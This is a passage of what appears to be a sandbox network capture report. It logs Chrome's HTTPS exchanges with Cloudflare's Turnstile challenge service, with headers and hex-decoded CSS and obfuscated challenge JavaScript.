                                                                                                                                                              2024-01-17 16:39:15 UTC1369INData Raw: 70 6c 61 63 65 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 20 73 70 61 63 65 2d 65 76 65 6e 6c 79 3b 0a 20 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 20 20 76 69 73 69 62 69 6c 69 74 79 3a 20 76 69 73 69 62 6c 65 3b 0a 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 33 70 78 3b 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 31 70 78 3b 0a 7d 0a 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 66 61 69 6c 2d 69 63 6f 6e 20 7b 0a 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 34 70 78 3b 0a 20 20 77 69 64 74 68 3a 20 32 35 70 78 3b 0a 20 20 68 65 69 67 68 74 3a 20 32 35 70 78 3b 0a 7d 0a 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 65 78 70 69 72 65 64 20 7b 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 39 70 78 3b 0a 20 20 6d 61 72 67
                                                                                                                                                              Data Ascii: place-content: center space-evenly; align-items: center; visibility: visible; line-height: 13px; font-size: 11px;}.size-compact #fail-icon { margin-right: 4px; width: 25px; height: 25px;}.size-compact #expired { margin-top: 9px; marg
                                                                                                                                                              2024-01-17 16:39:15 UTC1369INData Raw: 6c 20 7b 0a 20 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 33 37 70 78 3b 0a 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 30 3b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 72 69 67 68 74 3b 0a 7d 0a 2e 72 74 6c 20 2e 63 74 70 2d 63 68 65 63 6b 62 6f 78 2d 6c 61 62 65 6c 20 69 6e 70 75 74 20 7b 0a 20 20 72 69 67 68 74 3a 20 31 38 70 78 3b 0a 7d 0a 2e 72 74 6c 20 2e 63 74 70 2d 63 68 65 63 6b 62 6f 78 2d 6c 61 62 65 6c 20 69 6e 70 75 74 3a 63 68 65 63 6b 65 64 20 7e 20 2e 6d 61 72 6b 3a 3a 61 66 74 65 72 20 7b 0a 20 20 72 69 67 68 74 3a 20 38 70 78 3b 0a 7d 0a 2e 72 74 6c 20 2e 63 74 70 2d 63 68 65 63 6b 62 6f 78 2d 6c 61 62 65 6c 20 2e 6d 61 72 6b 20 7b 0a 20 20 72 69 67 68 74 3a 20 31 38 70 78 3b 0a 7d 0a 2e 72 74 6c 20 2e 63 74 70 2d 63 68 65 63
                                                                                                                                                              Data Ascii: l { padding-right: 37px; padding-left: 0; text-align: right;}.rtl .ctp-checkbox-label input { right: 18px;}.rtl .ctp-checkbox-label input:checked ~ .mark::after { right: 8px;}.rtl .ctp-checkbox-label .mark { right: 18px;}.rtl .ctp-chec


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              26192.168.2.449774104.17.2.1844434520C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              2024-01-17 16:39:16 UTC710OUTGET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=847008825fbf8ce0 HTTP/1.1
                                                                                                                                                              Host: challenges.cloudflare.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                              Accept: */*
                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                              Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/1af7i/0x4AAAAAAAQGgmt388O38mZL/auto/normal
                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              2024-01-17 16:39:16 UTC335INHTTP/1.1 200 OK
                                                                                                                                                              Date: Wed, 17 Jan 2024 16:39:16 GMT
                                                                                                                                                              Content-Type: application/javascript; charset=UTF-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: close
                                                                                                                                                              cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                              Server: cloudflare
                                                                                                                                                              CF-RAY: 84700888aebd0c78-EWR
                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                              2024-01-17 16:39:16 UTC1034INData Raw: 37 65 36 33 0d 0a 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 7e 66 75 6e 63 74 69 6f 6e 28 69 61 2c 66 77 2c 66 78 2c 66 79 2c 66 43 2c 66 44 2c 67 31 2c 67 35 2c 67 38 2c 67 39 2c 67 61 2c 67 62 2c 67 63 2c 67 64 2c 67 65 2c 67 66 2c 67 67 2c 67 68 2c 67 69 2c 67 6a 2c 67 6b 2c 67 6c 2c 67 6d 2c 67 6e 2c 67 6f 2c 67 70 2c 67 71 2c 67 72 2c 67 73 2c 67 74 2c 67 75 2c 67 76 2c 67 77 2c 67 78 2c 67 79 2c 67 7a 2c 67 41 2c 67 42 2c 67 43 2c 67 44 2c 67 45 2c 67 46 2c 67 47 2c 67 48 2c 67 49 2c 67 4a 2c 67 4b 2c 67 4c 2c 67 4d 2c 67 4e 2c 67 4f 2c 67 50 2c 67 51 2c 67 52 2c 67 53 2c 67 54 2c 67 55 2c 67 56 2c 67 57 2c 67 58 2c 67 5a 2c 68 64 2c 68 71 2c 68 76 2c 68 77 2c 68 47 2c 68 50 2c 68 54 2c 69 30 2c 69 34 2c
                                                                                                                                                              Data Ascii: 7e63window._cf_chl_opt.uaO=false;~function(ia,fw,fx,fy,fC,fD,g1,g5,g8,g9,ga,gb,gc,gd,ge,gf,gg,gh,gi,gj,gk,gl,gm,gn,go,gp,gq,gr,gs,gt,gu,gv,gw,gx,gy,gz,gA,gB,gC,gD,gE,gF,gG,gH,gI,gJ,gK,gL,gM,gN,gO,gP,gQ,gR,gS,gT,gU,gV,gW,gX,gZ,hd,hq,hv,hw,hG,hP,hT,i0,i4,
                                                                                                                                                              2024-01-17 16:39:16 UTC1369INData Raw: 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3e 69 7d 2c 27 78 50 52 58 6e 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 7c 68 7d 2c 27 71 55 78 54 42 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3d 3d 69 7d 2c 27 57 55 6b 78 56 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 6d 77 42 62 7a 27 3a 69 4c 28 35 38 32 29 2c 27 55 5a 45 42 55 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 7c 68 7d 2c 27 6a 72 56 67 70 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3d 3d 69 7d 2c 27 43 50 41 56 6b 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 3c 69 7d 2c 27 6c 6a 54 78 50 27 3a
                                                                                                                                                              Data Ascii: ction(h,i){return h>i},'xPRXn':function(h,i){return i|h},'qUxTB':function(h,i){return h==i},'WUkxV':function(h,i){return h(i)},'mwBbz':iL(582),'UZEBU':function(h,i){return i|h},'jrVgp':function(h,i){return h==i},'CPAVk':function(h,i){return h<<i},'ljTxP':
                                                                                                                                                              2024-01-17 16:39:16 UTC1369INData Raw: 29 7b 72 65 74 75 72 6e 20 69 4e 3d 62 2c 64 5b 69 4e 28 31 35 30 38 29 5d 28 4f 2c 50 29 7d 2c 27 42 52 64 46 4b 27 3a 66 75 6e 63 74 69 6f 6e 28 4f 2c 50 29 7b 72 65 74 75 72 6e 20 4f 26 50 7d 2c 27 52 55 48 76 68 27 3a 66 75 6e 63 74 69 6f 6e 28 4f 2c 50 29 7b 72 65 74 75 72 6e 20 4f 2b 50 7d 2c 27 47 51 49 57 63 27 3a 66 75 6e 63 74 69 6f 6e 28 4f 2c 50 29 7b 72 65 74 75 72 6e 20 4f 2d 50 7d 2c 27 75 77 65 47 5a 27 3a 66 75 6e 63 74 69 6f 6e 28 4f 2c 50 29 7b 72 65 74 75 72 6e 20 4f 5e 50 7d 2c 27 72 71 50 6b 52 27 3a 66 75 6e 63 74 69 6f 6e 28 4f 2c 50 2c 69 4f 29 7b 72 65 74 75 72 6e 20 69 4f 3d 62 2c 64 5b 69 4f 28 31 30 37 38 29 5d 28 4f 2c 50 29 7d 2c 27 75 76 72 7a 64 27 3a 66 75 6e 63 74 69 6f 6e 28 4f 2c 50 2c 69 50 29 7b 72 65 74 75 72 6e 20
                                                                                                                                                              Data Ascii: ){return iN=b,d[iN(1508)](O,P)},'BRdFK':function(O,P){return O&P},'RUHvh':function(O,P){return O+P},'GQIWc':function(O,P){return O-P},'uweGZ':function(O,P){return O^P},'rqPkR':function(O,P,iO){return iO=b,d[iO(1078)](O,P)},'uvrzd':function(O,P,iP){return
                                                                                                                                                              2024-01-17 16:39:16 UTC1369INData Raw: 51 28 31 32 34 39 29 5d 28 38 37 2c 74 68 69 73 2e 67 29 5d 5b 30 5d 2b 2b 29 2c 31 37 34 29 2b 32 35 36 2c 32 35 35 29 29 3c 3c 38 7c 73 5b 69 51 28 32 30 30 32 29 5d 28 74 68 69 73 2e 68 5b 73 5b 69 51 28 31 32 30 33 29 5d 28 38 37 2c 74 68 69 73 2e 67 29 5d 5b 33 5d 2c 73 5b 69 51 28 31 34 39 33 29 5d 28 38 32 2b 74 68 69 73 2e 68 5b 73 5b 69 51 28 32 30 30 32 29 5d 28 38 37 2c 74 68 69 73 2e 67 29 5d 5b 31 5d 5b 69 51 28 31 38 39 38 29 5d 28 74 68 69 73 2e 68 5b 74 68 69 73 2e 67 5e 38 37 5d 5b 30 5d 2b 2b 29 2c 32 35 35 29 29 2c 50 5b 33 5d 3d 73 5b 69 51 28 32 30 30 32 29 5d 28 74 68 69 73 2e 68 5b 73 5b 69 51 28 31 33 39 35 29 5d 28 38 37 2c 74 68 69 73 2e 67 29 5d 5b 33 5d 2c 73 5b 69 51 28 31 34 39 33 29 5d 28 73 5b 69 51 28 35 36 37 29 5d 28 74
                                                                                                                                                              Data Ascii: Q(1249)](87,this.g)][0]++),174)+256,255))<<8|s[iQ(2002)](this.h[s[iQ(1203)](87,this.g)][3],s[iQ(1493)](82+this.h[s[iQ(2002)](87,this.g)][1][iQ(1898)](this.h[this.g^87][0]++),255)),P[3]=s[iQ(2002)](this.h[s[iQ(1395)](87,this.g)][3],s[iQ(1493)](s[iQ(567)](t
                                                                                                                                                              2024-01-17 16:39:16 UTC1369INData Raw: 2b 2b 7d 66 6f 72 28 4e 3d 32 2c 78 3d 30 3b 78 3c 47 3b 49 3d 49 3c 3c 31 7c 31 26 4e 2c 64 5b 69 51 28 32 38 33 29 5d 28 4a 2c 6a 2d 31 29 3f 28 4a 3d 30 2c 48 5b 69 51 28 38 34 39 29 5d 28 64 5b 69 51 28 31 31 36 39 29 5d 28 6f 2c 49 29 29 2c 49 3d 30 29 3a 4a 2b 2b 2c 4e 3e 3e 3d 31 2c 78 2b 2b 29 3b 66 6f 72 28 3b 3b 29 69 66 28 49 3c 3c 3d 31 2c 64 5b 69 51 28 35 34 37 29 5d 28 4a 2c 6a 2d 31 29 29 7b 48 5b 69 51 28 38 34 39 29 5d 28 64 5b 69 51 28 31 39 31 37 29 5d 28 6f 2c 49 29 29 3b 62 72 65 61 6b 7d 65 6c 73 65 20 4a 2b 2b 3b 72 65 74 75 72 6e 20 48 5b 69 51 28 31 33 34 35 29 5d 28 27 27 29 7d 2c 27 6a 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 52 29 7b 69 66 28 69 52 3d 69 4c 2c 64 5b 69 52 28 32 30 36 36 29 5d 3d 3d 3d 69 52 28 31 37 38 36 29
                                                                                                                                                              Data Ascii: ++}for(N=2,x=0;x<G;I=I<<1|1&N,d[iQ(283)](J,j-1)?(J=0,H[iQ(849)](d[iQ(1169)](o,I)),I=0):J++,N>>=1,x++);for(;;)if(I<<=1,d[iQ(547)](J,j-1)){H[iQ(849)](d[iQ(1917)](o,I));break}else J++;return H[iQ(1345)]('')},'j':function(h,iR){if(iR=iL,d[iR(2066)]===iR(1786)
                                                                                                                                                              2024-01-17 16:39:16 UTC1369INData Raw: 28 30 3c 4e 3f 31 3a 30 2c 46 29 2c 46 3c 3c 3d 31 29 3b 73 5b 42 2b 2b 5d 3d 65 28 4a 29 2c 4f 3d 42 2d 31 2c 78 2d 2d 3b 62 72 65 61 6b 3b 63 61 73 65 20 31 3a 66 6f 72 28 4a 3d 30 2c 4b 3d 4d 61 74 68 5b 69 54 28 36 33 35 29 5d 28 32 2c 31 36 29 2c 46 3d 31 3b 46 21 3d 4b 3b 4e 3d 64 5b 69 54 28 31 39 35 30 29 5d 28 47 2c 48 29 2c 48 3e 3e 3d 31 2c 48 3d 3d 30 26 26 28 48 3d 6a 2c 47 3d 64 5b 69 54 28 32 30 38 33 29 5d 28 6f 2c 49 2b 2b 29 29 2c 4a 7c 3d 64 5b 69 54 28 33 38 31 29 5d 28 30 3c 4e 3f 31 3a 30 2c 46 29 2c 46 3c 3c 3d 31 29 3b 73 5b 42 2b 2b 5d 3d 65 28 4a 29 2c 4f 3d 64 5b 69 54 28 35 36 31 29 5d 28 42 2c 31 29 2c 78 2d 2d 3b 62 72 65 61 6b 3b 63 61 73 65 20 32 3a 72 65 74 75 72 6e 20 44 5b 69 54 28 31 33 34 35 29 5d 28 27 27 29 7d 69 66
                                                                                                                                                              Data Ascii: (0<N?1:0,F),F<<=1);s[B++]=e(J),O=B-1,x--;break;case 1:for(J=0,K=Math[iT(635)](2,16),F=1;F!=K;N=d[iT(1950)](G,H),H>>=1,H==0&&(H=j,G=d[iT(2083)](o,I++)),J|=d[iT(381)](0<N?1:0,F),F<<=1);s[B++]=e(J),O=d[iT(561)](B,1),x--;break;case 2:return D[iT(1345)]('')}if
                                                                                                                                                              2024-01-17 16:39:16 UTC1369INData Raw: 69 6f 6e 28 73 2c 75 29 7b 72 65 74 75 72 6e 20 73 2b 75 7d 2c 27 4e 6c 63 6b 77 27 3a 66 75 6e 63 74 69 6f 6e 28 73 2c 75 2c 6a 39 29 7b 72 65 74 75 72 6e 20 6a 39 3d 6a 37 2c 66 5b 6a 39 28 31 32 35 32 29 5d 28 73 2c 75 29 7d 7d 2c 6a 37 28 39 36 30 29 3d 3d 3d 66 5b 6a 37 28 38 32 33 29 5d 29 74 72 79 7b 69 66 28 75 3d 6e 5b 6a 37 28 31 35 33 32 29 5d 28 48 2c 6e 5b 6a 37 28 35 32 33 29 5d 29 2c 76 3d 49 5b 6a 37 28 31 37 36 31 29 5d 5b 6a 37 28 39 39 32 29 5d 3f 27 68 2f 27 2b 4a 5b 6a 37 28 31 37 36 31 29 5d 5b 6a 37 28 39 39 32 29 5d 2b 27 2f 27 3a 27 27 2c 77 3d 6e 5b 6a 37 28 34 33 36 29 5d 28 6e 5b 6a 37 28 34 33 36 29 5d 28 6e 5b 6a 37 28 38 36 30 29 5d 28 6e 5b 6a 37 28 31 37 34 38 29 5d 2b 76 2c 6e 5b 6a 37 28 39 39 34 29 5d 29 2b 31 2b 6a 37
                                                                                                                                                              Data Ascii: ion(s,u){return s+u},'Nlckw':function(s,u,j9){return j9=j7,f[j9(1252)](s,u)}},j7(960)===f[j7(823)])try{if(u=n[j7(1532)](H,n[j7(523)]),v=I[j7(1761)][j7(992)]?'h/'+J[j7(1761)][j7(992)]+'/':'',w=n[j7(436)](n[j7(436)](n[j7(860)](n[j7(1748)]+v,n[j7(994)])+1+j7
                                                                                                                                                              2024-01-17 16:39:16 UTC1369INData Raw: 34 29 5d 3d 6a 63 28 31 33 31 38 29 2c 69 5b 6a 63 28 32 34 36 29 5d 3d 6a 63 28 36 30 30 29 2c 69 5b 6a 63 28 32 37 38 29 5d 3d 6a 63 28 31 35 33 35 29 2c 69 5b 6a 63 28 32 30 31 38 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 42 2c 43 29 7b 72 65 74 75 72 6e 20 42 3d 3d 3d 43 7d 2c 69 5b 6a 63 28 38 38 30 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 42 2c 43 29 7b 72 65 74 75 72 6e 20 43 21 3d 3d 42 7d 2c 69 5b 6a 63 28 31 37 37 38 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 42 2c 43 29 7b 72 65 74 75 72 6e 20 42 2b 43 7d 2c 69 5b 6a 63 28 31 30 30 35 29 5d 3d 6a 63 28 33 36 30 29 2c 69 5b 6a 63 28 35 32 32 29 5d 3d 6a 63 28 31 38 37 30 29 2c 69 5b 6a 63 28 31 33 35 34 29 5d 3d 6a 63 28 37 34 36 29 2c 69 5b 6a 63 28 31 30 33 37 29 5d 3d 6a 63 28 35 38 37 29 2c 69 29 3b 74 72 79
                                                                                                                                                              Data Ascii: 4)]=jc(1318),i[jc(246)]=jc(600),i[jc(278)]=jc(1535),i[jc(2018)]=function(B,C){return B===C},i[jc(880)]=function(B,C){return C!==B},i[jc(1778)]=function(B,C){return B+C},i[jc(1005)]=jc(360),i[jc(522)]=jc(1870),i[jc(1354)]=jc(746),i[jc(1037)]=jc(587),i);try
                                                                                                                                                              2024-01-17 16:39:16 UTC1369INData Raw: 5d 3d 66 75 6e 63 74 69 6f 6e 28 6e 2c 6f 29 7b 72 65 74 75 72 6e 20 6e 3e 3e 6f 7d 2c 69 5b 6a 64 28 34 30 32 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 6e 2c 6f 29 7b 72 65 74 75 72 6e 20 6f 7c 6e 7d 2c 69 5b 6a 64 28 31 38 30 31 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 6e 2c 6f 29 7b 72 65 74 75 72 6e 20 6e 26 6f 7d 2c 69 5b 6a 64 28 31 32 30 34 29 5d 3d 6a 64 28 32 31 30 37 29 2c 69 5b 6a 64 28 38 32 34 29 5d 3d 6a 64 28 33 31 30 29 2c 69 5b 6a 64 28 31 31 35 30 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 6e 2c 6f 29 7b 72 65 74 75 72 6e 20 6e 2b 6f 7d 2c 69 5b 6a 64 28 37 38 36 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 6e 2c 6f 29 7b 72 65 74 75 72 6e 20 6e 2b 6f 7d 2c 69 5b 6a 64 28 31 32 37 37 29 5d 3d 6a 64 28 37 34 30 29 2c 69 5b 6a 64 28 31 30 36 34 29 5d 3d 6a 64 28 33
                                                                                                                                                              Data Ascii: ]=function(n,o){return n>>o},i[jd(402)]=function(n,o){return o|n},i[jd(1801)]=function(n,o){return n&o},i[jd(1204)]=jd(2107),i[jd(824)]=jd(310),i[jd(1150)]=function(n,o){return n+o},i[jd(786)]=function(n,o){return n+o},i[jd(1277)]=jd(740),i[jd(1064)]=jd(3
                                                                                                                                                              2024-01-17 16:39:16 UTC1369INData Raw: 2c 66 77 5b 69 61 28 31 33 39 34 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 64 2c 65 2c 6a 6a 2c 66 2c 67 2c 68 2c 69 2c 6a 2c 6b 29 7b 69 66 28 6a 6a 3d 69 61 2c 66 3d 7b 27 4e 65 55 49 63 27 3a 66 75 6e 63 74 69 6f 6e 28 6c 2c 6d 29 7b 72 65 74 75 72 6e 20 6c 2b 6d 7d 2c 27 65 54 71 4d 42 27 3a 6a 6a 28 37 31 37 29 2c 27 41 4c 6b 65 4f 27 3a 66 75 6e 63 74 69 6f 6e 28 6c 2c 6d 29 7b 72 65 74 75 72 6e 20 6d 2a 6c 7d 2c 27 50 59 74 63 6b 27 3a 66 75 6e 63 74 69 6f 6e 28 6c 29 7b 72 65 74 75 72 6e 20 6c 28 29 7d 2c 27 43 58 77 67 67 27 3a 66 75 6e 63 74 69 6f 6e 28 6c 2c 6d 29 7b 72 65 74 75 72 6e 20 6c 28 6d 29 7d 2c 27 45 52 45 4d 4b 27 3a 66 75 6e 63 74 69 6f 6e 28 6c 2c 6d 29 7b 72 65 74 75 72 6e 20 6c 26 6d 7d 2c 27 55 6a 77 6f 62 27 3a 66 75 6e 63 74
                                                                                                                                                              Data Ascii: ,fw[ia(1394)]=function(c,d,e,jj,f,g,h,i,j,k){if(jj=ia,f={'NeUIc':function(l,m){return l+m},'eTqMB':jj(717),'ALkeO':function(l,m){return m*l},'PYtck':function(l){return l()},'CXwgg':function(l,m){return l(m)},'EREMK':function(l,m){return l&m},'Ujwob':funct


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              27192.168.2.449775104.17.3.1844434520C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              2024-01-17 16:39:16 UTC487OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/1672084046:1705509045:1KRCh9wlmdHNe1_uWjab1xjgCNY1yb1dMySJtbe4upc/8470083bba6a4201/20178212f2891c9 HTTP/1.1
                                                                                                                                                              Host: challenges.cloudflare.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                              Accept: */*
                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              2024-01-17 16:39:16 UTC386INHTTP/1.1 400 Bad Request
                                                                                                                                                              Date: Wed, 17 Jan 2024 16:39:16 GMT
                                                                                                                                                              Content-Type: application/json
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: close
                                                                                                                                                              cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                              cf-chl-out: 5oXWdFvcb+NlA0hs664x+Q==$2TPK2X3VbpwOOp74xfGViQ==
                                                                                                                                                              Server: cloudflare
                                                                                                                                                              CF-RAY: 847008899aa38ccd-EWR
                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                              2024-01-17 16:39:16 UTC12INData Raw: 37 0d 0a 69 6e 76 61 6c 69 64 0d 0a
                                                                                                                                                              Data Ascii: 7invalid
                                                                                                                                                              2024-01-17 16:39:16 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              28192.168.2.449779104.17.2.1844434520C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              2024-01-17 16:39:18 UTC916OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/1369030472:1705508754:EmThWJxmRohva1owlnsvJ5GEpCR6N4Hxvwfz_SQ26Ik/847008825fbf8ce0/150b112ab8f1d86 HTTP/1.1
                                                                                                                                                              Host: challenges.cloudflare.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Content-Length: 2654
                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                              Content-type: application/x-www-form-urlencoded
                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                              CF-Challenge: 150b112ab8f1d86
                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                              Accept: */*
                                                                                                                                                              Origin: https://challenges.cloudflare.com
                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                              Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/1af7i/0x4AAAAAAAQGgmt388O38mZL/auto/normal
                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              2024-01-17 16:39:18 UTC2654OUTData Raw: 76 5f 38 34 37 30 30 38 38 32 35 66 62 66 38 63 65 30 3d 6a 55 67 4f 59 4f 6d 4f 7a 4f 4c 4f 54 4f 74 56 79 56 4f 4b 56 4f 61 78 35 31 35 6c 46 62 35 65 56 35 73 46 68 76 35 6b 50 35 46 43 32 38 35 50 35 65 65 46 4e 35 6c 6a 69 35 32 4f 48 78 6b 35 79 4c 4e 4b 35 30 7a 35 68 4d 67 2d 6c 58 35 65 56 35 77 35 61 56 30 79 6d 35 66 50 43 35 30 30 65 66 79 35 59 56 56 46 71 36 65 46 4b 52 7a 30 64 48 44 46 53 35 66 55 55 73 35 77 32 61 73 4c 73 35 66 43 35 34 35 6a 67 65 48 36 6e 47 30 73 35 24 6f 56 69 35 46 67 35 64 42 43 78 53 4f 30 6c 35 48 45 61 35 69 56 35 73 39 69 35 42 4e 67 38 66 4f 46 4c 65 4f 66 31 35 72 70 70 35 46 43 35 31 4f 48 57 66 74 47 50 69 69 6d 53 45 35 46 48 35 79 6d 44 66 4b 4e 35 38 24 4e 35 6e 49 59 6d 4c 24 69 6e 78 65 4b 61 65 4e 34
                                                                                                                                                              Data Ascii: v_847008825fbf8ce0=jUgOYOmOzOLOTOtVyVOKVOax515lFb5eV5sFhv5kP5FC285P5eeFN5lji52OHxk5yLNK50z5hMg-lX5eV5w5aV0ym5fPC500efy5YVVFq6eFKRz0dHDFS5fUUs5w2asLs5fC545jgeH6nG0s5$oVi5Fg5dBCxSO0l5HEa5iV5s9i5BNg8fOFLeOf15rpp5FC51OHWftGPiimSE5FH5ymDfKN58$N5nIYmL$inxeKaeN4
                                                                                                                                                              2024-01-17 16:39:18 UTC647INHTTP/1.1 200 OK
                                                                                                                                                              Date: Wed, 17 Jan 2024 16:39:18 GMT
                                                                                                                                                              Content-Type: text/plain; charset=UTF-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: close
                                                                                                                                                              cf-chl-gen: GhMjICJ7Lt2N431jywwMEjHD5y+wZMKX/z3xh2O4kgjm6dCikMszfKGjEg6DbQntC5XkYcaxbDAlmmFEO8ZC96pBLUXZc9MPE79TWQ3O3MS/Fm2tJmlux6qDgLOEg++7A8RF0Ny6E30K8cS8K8fu/7oHplXoSWMSQpWZ5kqwYdt4idih3hWlFBh9tu6ISVdSqmuVvc88x797eqGEFX3/1/PEwO+4rN3/luFrnsl6nqCOyAXf4E/A3RwOUKanpzVvlX8nuS/izgJufjcansJazJ1xjkPYVtrTv2h5Ib55T2IIiKg2ys5ZKvqRrbJf0AY2RoLXCYmCdqlk9vE6R3wnQrae4/VNoJyasVaOqDLoBYp0Uyycmzfj/vt6sHFiWU1c$p1ppNNsualu8dpcgDqfx7A==
                                                                                                                                                              Server: cloudflare
                                                                                                                                                              CF-RAY: 84700891dbac4249-EWR
                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                              2024-01-17 16:39:18 UTC722INData Raw: 37 64 32 62 0d 0a 63 33 4e 75 62 34 31 74 68 6f 65 4f 57 35 5a 33 6a 70 65 53 62 33 69 42 6c 6e 71 63 61 4a 36 45 6e 32 74 38 66 6d 31 7a 68 72 65 4d 67 33 61 50 6c 58 53 4c 6a 5a 4f 79 6f 72 61 50 70 58 2b 58 75 72 2b 2b 70 4c 36 45 6f 4a 69 50 30 4d 4b 7a 79 4d 6d 57 6c 63 2b 6f 6b 39 61 36 31 4c 69 62 6c 35 6d 33 75 38 53 65 30 64 76 45 6f 74 58 68 7a 4d 72 5a 36 4d 66 71 73 4c 2b 74 37 61 69 78 38 38 75 34 79 50 7a 75 32 2b 43 35 37 4e 48 37 77 50 48 37 38 4d 4f 37 43 50 33 46 43 65 72 61 34 65 50 73 44 77 6e 32 36 41 63 4e 45 65 54 31 45 74 6b 50 45 78 6e 78 38 42 48 7a 4a 76 34 44 39 51 51 44 39 2f 6f 48 35 51 33 35 48 50 34 45 42 4f 38 57 4f 54 6e 35 46 50 67 62 47 2f 77 74 51 42 34 67 46 78 6b 68 4a 77 51 65 46 52 38 46 4c 44 39 46 44 69 6f 75 52
